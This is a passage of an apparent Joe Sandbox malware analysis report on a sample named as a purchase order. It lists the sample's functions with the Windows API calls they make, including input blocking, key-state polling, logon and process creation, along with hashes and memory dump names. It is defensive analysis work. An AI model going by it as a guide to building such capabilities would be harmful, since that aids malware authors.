                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Find$File$CloseFirstNext
                                  • String ID:
                                  • API String ID: 3541575487-0
                                  • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                  • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                  • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                  • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                  Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                  • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: FileFind$AttributesCloseFirst
                                  • String ID:
                                  • API String ID: 48322524-0
                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                  Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                  • String ID:
                                  • API String ID: 901099227-0
                                  • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                  • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                  Function 0045034C Relevance: 3.1, APIs: 2, Instructions: 88nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetParent.USER32(?), ref: 004503C8
                                  • NtdllDialogWndProc_W.USER32(?,00000138,?,?), ref: 00450417
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllParentProc_
                                  • String ID:
                                  • API String ID: 2395719762-0
                                  • Opcode ID: 257248ebf188e141d38afd5c48be2ff607e0986a31bd54eef4ebc635ce2a3468
                                  • Instruction ID: c99212cd859981529d564057689d428d6c5f9a70333a9b0d3c053c51a1006402
                                  • Opcode Fuzzy Hash: 257248ebf188e141d38afd5c48be2ff607e0986a31bd54eef4ebc635ce2a3468
                                  • Instruction Fuzzy Hash: 6911D6351062C0ABD7139B38CC8589B3F68DE43335B18069BF9984F2A3CA344849CB6B
                                  Function 0046A38E Relevance: 3.1, APIs: 2, Instructions: 59nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000114,00000000,?), ref: 0046A41E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 48e87686a5ea7b01e998f9eaac7baca7642045ed066bdf8ff442be2b7787ab7b
                                  • Instruction ID: c63ea47e1094e29e9280ddef29c929305bd4827c6ad27dba34d4d07e9709e350
                                  • Opcode Fuzzy Hash: 48e87686a5ea7b01e998f9eaac7baca7642045ed066bdf8ff442be2b7787ab7b
                                  • Instruction Fuzzy Hash: DF1127322001046BDB10CB04DC849AB7B24EF86324F20811BF60597282CF799C62DBA6
                                  Function 00447ABC Relevance: 3.1, APIs: 2, Instructions: 58nativewindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00447B1B
                                  • NtdllDialogWndProc_W.USER32(?,0000002B,?,?), ref: 00447B41
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogMessageNtdllProc_Send
                                  • String ID:
                                  • API String ID: 3814093946-0
                                  • Opcode ID: 4cacbd902a3e8074bd40219f09cd08209c02a14dfdcaa0ba7cf7d9d990aaa468
                                  • Instruction ID: c1d44d43ee376328972d656b5f00bca06b75d59f5ecfdf91114eb8bc10ef771e
                                  • Opcode Fuzzy Hash: 4cacbd902a3e8074bd40219f09cd08209c02a14dfdcaa0ba7cf7d9d990aaa468
                                  • Instruction Fuzzy Hash: C611C832200250ABE220DF45EC84FABB769FBD6728F10462FF6404B290C775A846C765
                                  Function 004629B7 Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                    • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                    • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                  • NtdllDialogWndProc_W.USER32(?,00000201,?), ref: 00462A03
                                  • NtdllDialogWndProc_W.USER32(?,00000204,?,00000000), ref: 00462A24
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: AsyncDialogNtdllProc_State$ClientCursorScreen
                                  • String ID:
                                  • API String ID: 2121657457-0
                                  • Opcode ID: 3aa67e009f936217d0391dd0aa5e8dd8940afc03e729d5e986ef420fd54892e7
                                  • Instruction ID: 08c67b91cd2399f8ba12915c6cae0ffbb32616dfeb2567f7c91428428e8fa67e
                                  • Opcode Fuzzy Hash: 3aa67e009f936217d0391dd0aa5e8dd8940afc03e729d5e986ef420fd54892e7
                                  • Instruction Fuzzy Hash: 76018172240124BBE7049F86EC99DFFB76CEB85762F10402BFA4197192C6B59811CBB5
                                  Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,?,?,?), ref: 0047EA9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                  • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                  • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                  • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                  Function 0044048E Relevance: 1.5, APIs: 1, Instructions: 32nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000006,?,?), ref: 004404DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 2b72283bca5b9e831272dd2a7d53a0b5c7148644ca1e9fa5d4a4720e5b910540
                                  • Instruction ID: 57bcafdb766b4b2a09d5adb44fbeadd94fd8413be8ed8c1894e52dfe49116fd8
                                  • Opcode Fuzzy Hash: 2b72283bca5b9e831272dd2a7d53a0b5c7148644ca1e9fa5d4a4720e5b910540
                                  • Instruction Fuzzy Hash: 1EF0B471500254ABE7148F05DC40A7B7B79EB86720F20461EFA144B280CB75AC62CBF4
                                  Function 0044036A Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000053,?,?), ref: 004403A3
                                    • Part of subcall function 00430B0F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004A9568,004A9554), ref: 00430B6C
                                    • Part of subcall function 00430B0F: CloseHandle.KERNEL32(00000000), ref: 00430B7D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CloseCreateDialogHandleNtdllProc_Process
                                  • String ID:
                                  • API String ID: 4178364262-0
                                  • Opcode ID: 18637488ffc27074e36ea774df1fe185273bfafa6678f284e57b2aa28cd93e6f
                                  • Instruction ID: b7a625ee7c2def1aa5d9f3d540ff339fd2ef2d8d1ff8bada222fa30ad2921ed2
                                  • Opcode Fuzzy Hash: 18637488ffc27074e36ea774df1fe185273bfafa6678f284e57b2aa28cd93e6f
                                  • Instruction Fuzzy Hash: B9F06D76240218ABDB00EF88EC50D9B73ADEF8D355B00881AFE449B341CB74BD60CBA4
                                  Function 00454CFC Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000232,?,?), ref: 00454D3F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 8b2826b66b2b31c60da67efd8c1127cd395e8061a58d0ebf04d064e84851811b
                                  • Instruction ID: 9a3c2df9a808ce5be259132a16ac8c8eacf78c0d12b80627a94478e4176c466c
                                  • Opcode Fuzzy Hash: 8b2826b66b2b31c60da67efd8c1127cd395e8061a58d0ebf04d064e84851811b
                                  • Instruction Fuzzy Hash: DCF08C70244208BBE310DE48CC45F9B7BA8EB4A715F508109F958572D2CAB07844CBA5
                                  Function 0044786A Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00430CCB: FreeLibrary.KERNEL32(?), ref: 00430CD8
                                  • NtdllDialogWndProc_W.USER32(?,0000031A,?,?), ref: 0044789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogFreeLibraryNtdllProc_
                                  • String ID:
                                  • API String ID: 4233852882-0
                                  • Opcode ID: 2bb9f87cd0a41e8130f62da48c4106c6c5914e99f78363fa9e43659e77d0986b
                                  • Instruction ID: fc5b3b6852e979a31c658b193d70e7a126e9e4bfaffbe52d983344414c160798
                                  • Opcode Fuzzy Hash: 2bb9f87cd0a41e8130f62da48c4106c6c5914e99f78363fa9e43659e77d0986b
                                  • Instruction Fuzzy Hash: 79E0EDB5D15218BBDB00EFB5DC498EEB7ACEB88301B00896AFC1193241D6749A118FA5
                                  Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • BlockInput.USER32(00000001), ref: 0045A38B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: BlockInput
                                  • String ID:
                                  • API String ID: 3456056419-0
                                  • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                  • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                  • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                  • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                  Function 00447B4E Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000007,?,00000000), ref: 00447B7E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: DialogNtdllProc_
                                  • String ID:
                                  • API String ID: 3239928679-0
                                  • Opcode ID: 8e6373e291cc12f70f08d4f4410b7c8524115a22fdba9030887a55257885973c
                                  • Instruction ID: 312b02e0ec000ae8217ec3e2a2b597e760e3ea2cc33aa0823c57154ec146f294
                                  • Opcode Fuzzy Hash: 8e6373e291cc12f70f08d4f4410b7c8524115a22fdba9030887a55257885973c
                                  • Instruction Fuzzy Hash: F0E08635640114BFD600EF85DC51FEB772CEF8A754F20800AFA044B291CA75F802CBA9
                                  Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: LogonUser
                                  • String ID:
                                  • API String ID: 1244722697-0
                                  • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                  • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                  • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                  • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                  Function 00440306 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtdllDialogWndProc_W.USER32(?,00000212), ref: 0044032E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
